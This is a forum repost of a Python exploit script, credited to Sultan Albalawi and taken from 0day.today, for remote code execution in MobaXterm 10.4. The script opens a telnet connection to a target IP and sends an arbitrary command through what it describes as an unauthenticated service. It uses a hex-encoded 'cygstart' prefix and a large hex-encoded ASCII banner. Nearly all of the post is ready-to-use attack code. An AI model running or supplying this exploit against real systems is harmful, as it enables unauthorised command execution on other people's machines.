Jump to content
Fi8sVrs

MobaXtrem 10.4 Remote Code Execution Exploit

Recommended Posts

Author:  sultan albalawi  |  Category: remote exploits  |  Platform: windows  

Date add:  12-09-2017  |  Risk: critlow_4.gif [Security Risk Critical]   |   0day-ID: 0day-ID-28494

 

import telnetlib,sys
 
# Exploit Title: MobaXtrem 10.4 Remote Code Execution
# Date: 11/9/2017
# Exploit Author: Sultan Albalawi 
# Vendor Homepage: http://mobatek.net
# Software Link: http://download.mobatek.net/10420170816103227/MobaXterm_Portable_v10.4.zip
# Version: 10.4
# Tested on: Windows Xp & Windows 7 & 10
# POC : https://www.youtube.com/watch?v=oYdzP0umtFA&feature=youtu.be
 
# Vulnerability Cause:::
# Telnet service doesn't authinticate for remote conncection which allows attacker to
# pass malicious commands over victim box through protocol. 
 
print "\x27\x27\x27\x0d\x0a\x20\x20\x20\x20\x20" \
      "\x20\x20\x5c\x20\x20\x20\x2d\x20\x20\x2d\x20" \
      "\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e" \
      "\x20\x20\x2d\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d" \
      "\x20\x2d\x20\x20\x2d\x20\x2d\x20\x20\x2d\x20" \
      "\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a" \
      "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \
      "\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74" \
      "\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \
      "\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a" \
      "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
      "\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20" \
      "\x60\x2e\x20\x20\x20\x20\x2c\x3b\x27\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70" \
      "\x50\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \
      "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x58\x20" \
      "\x2f\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20" \
      "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" \
      "\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
      "\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f" \
      "\x60\x20\x60\x20\x28\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \
      "\x0d\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x20" \
      "\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x64" \
      "\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20\x20" \
      "\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74" \
      "\x79\x60\x20\x20\x27\x20\x30\x20\x20\x30\x20" \
      "\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a" \
      "\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20" \
      "\x20\x20\x20\x20\x7c\x0d\x0a\x20\x20\x20\x20" \
      "\x2c\x20\x20\x20\x20\x20\x20\x20\x2c\x20\x20" \
      "\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \
      "\x2a\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20" \
      "\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20" \
      "\x20\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20" \
      "\x20\x60\x2e\x5f\x2e\x27\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d" \
      "\x5e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60\x20" \
      "\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d" \
      "\x2d\x2c\x2e\x2e\x5f\x3b\x2d\x2d\x2d\x3e\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20" \
      "\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f" \
      "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a" \
      "\x20\x20\x27\x20\x60\x20\x20\x20\x20\x2c\x20" \
      "\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65" \
      "\x77\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20" \
      "\x20\x20\x60\x2e\x5f\x20\x2c\x20\x20\x27\x20" \
      "\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x7c" \
      "\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x3b\x20\x2c\x27\x27\x2d\x2c\x3b\x27\x20\x60" \
      "\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f" \
      "\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x60\x60" \
      "\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d\x2d\x60\x20" \
      "\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20" \
      "\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x27\x2e\x20\x5f\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f" \
      "\x5f\x5f\x20\x7c\x5f\x20\x20\x49\x50\x53\x20" \
      "\x20\x20\x20\x20\x29\x0d\x0a\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20" \
      "\x20\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \
      "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x53\x75\x6c\x74\x61\x6e\x20" \
      "\x41\x6c\x62\x61\x6c\x61\x77\x69\x0d\x0a\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x68\x74\x74\x70\x73" \
      "\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65" \
      "\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65" \
      "\x6e\x74\x65\x73\x74\x33\x0d\x0a\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61" \
      "\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e" \
      "\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e" \
      "\x63\x6f\x6d\x0d\x0a\x20\x20\x20\x20\x20\x20" \
      "\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
      "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \
      "\x0a\x27\x27\x27"
def get_set(HOST,cmd):
    try :
      tn = telnetlib.Telnet(HOST)
      bg="\x63\x79\x67\x73\x74\x61\x72\x74"
      tn.write(bg+" ./"+cmd+"\n")
      tn.write(main())
      tn.read_all()
    except KeyboardInterrupt:
      print "[-] Execution stopped ... keyboard interrupt raised"
    except Exception as e:
      pass    
def main():
    if len(sys.argv)==2:
      HOST = sys.argv[1]
      cmd = str(raw_input("cmd> "))
      if "exit" in cmd :
        sys.exit("exiting...")
      else:
        print"Executing => %s"%cmd
        get_set(HOST,cmd)
    else:
      print "Usage: ./"+sys.argv[0]+" <target_ip>"   
if __name__ == '__main__':
      main()
 
#  0day.today [2017-09-12]  #

 

Source: http://0day.today/exploit/28494               

Edited by Fi8sVrs
  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...